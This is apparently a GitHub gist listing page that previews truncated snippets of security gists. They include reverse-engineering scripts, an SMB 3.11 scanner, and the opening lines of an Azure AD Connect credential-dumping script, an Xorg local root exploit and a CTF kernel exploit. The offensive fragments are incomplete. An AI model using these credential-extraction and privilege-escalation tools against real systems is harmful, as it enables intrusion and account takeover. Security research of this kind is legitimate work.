Skip to content

Instantly share code, notes, and snippets.

@NyaMisty
NyaMisty / outline_graph.py
Created September 1, 2022 01:02
IDA Graph view with outlined function included
View outline_graph.py
"""
summary: drawing custom graphs
description:
Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
show how to write actions that can be performed on those.
keywords: graph, actions
"""
from __future__ import print_function
# -----------------------------------------------------------------------
@smx-smx
smx-smx / !pwnkit
Last active January 26, 2022 04:28
CVE-2021-4034 (pkexec) self contained exploit PoC
View !pwnkit
CVE-2021-4034 (pkexec) self contained exploit PoC
@iann0036
iann0036 / gist:b473bbb3097c5f4c656ed3d07b4d2222
Last active February 28, 2024 19:39
List of expensive / long-term effect AWS IAM actions
View gist:b473bbb3097c5f4c656ed3d07b4d2222
route53domains:RegisterDomain
route53domains:RenewDomain
route53domains:TransferDomain
ec2:ModifyReservedInstances
ec2:PurchaseHostReservation
ec2:PurchaseReservedInstancesOffering
ec2:PurchaseScheduledInstances
rds:PurchaseReservedDBInstancesOffering
dynamodb:PurchaseReservedCapacityOfferings
s3:PutObjectRetention
View SystemCallAuditor.py
#Checks system calls for command injection patterns
#@author
#@category HackOvert
#@keybinding
#@menupath
#@toolbar
from ghidra.app.decompiler import DecompileOptions
from ghidra.app.decompiler import DecompInterface
from ghidra.program.model.pcode import Varnode
@xpn
xpn / azuread_decrypt_msol_v2.ps1
Created April 11, 2020 01:34
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
View azuread_decrypt_msol_v2.ps1
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
@nikallass
nikallass / check-smb-v3.11.sh
Created March 11, 2020 04:57
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
View check-smb-v3.11.sh
#!/bin/bash
if [ $# -eq 0 ]
then
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
exit 1
fi
echo "Checking if there's SMB v3.11 in" $1 "..."
nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'
@sobi3ch
sobi3ch / custom-cloud-commands
Last active February 14, 2023 23:36
whoami in az and aws cli versions + get-policy-document for aws
View custom-cloud-commands
# general
alias aws.whoami='aws iam get-user --query User.Arn --output text'
alias az.whoami='az ad signed-in-user show --query userPrincipalName --output tsv'
# In ~/.aws/credencials|config leave [default] profile empty and name it each one of it so `aws-env -l` can list all of them
# aws.profile # show current profile
# aws.profile profile-name # set profile name
# Double tab completion works
aws.profile ()
{
@cetfor
cetfor / emulate_pcode.py
Last active June 4, 2022 17:54
PCode Emulation with Python
View emulate_pcode.py
from ghidra.app.emulator import EmulatorHelper
from ghidra.program.model.symbol import SymbolUtilities
# Tested with Ghidra v9.1 and v9.1.1, future releases are likely to simplify
# and/or expand the EmulatorHelper class in the API.
# == Helper functions ======================================================
def getAddress(offset):
return currentProgram.getAddressFactory().getDefaultAddressSpace().getAddress(offset)
View x0rg.sh
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
@j00ru
j00ru / WCTF_2018_searchme_exploit.cpp
Created July 18, 2018 14:09
WCTF 2018 "searchme" exploit by Mateusz "j00ru" Jurczyk
View WCTF_2018_searchme_exploit.cpp
// WCTF 2018 "searchme" task exploit
//
// Author: Mateusz "j00ru" Jurczyk
// Date: 6 July 2018
// Tested on: Windows 10 1803 (10.0.17134.165)
//
// See also: https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>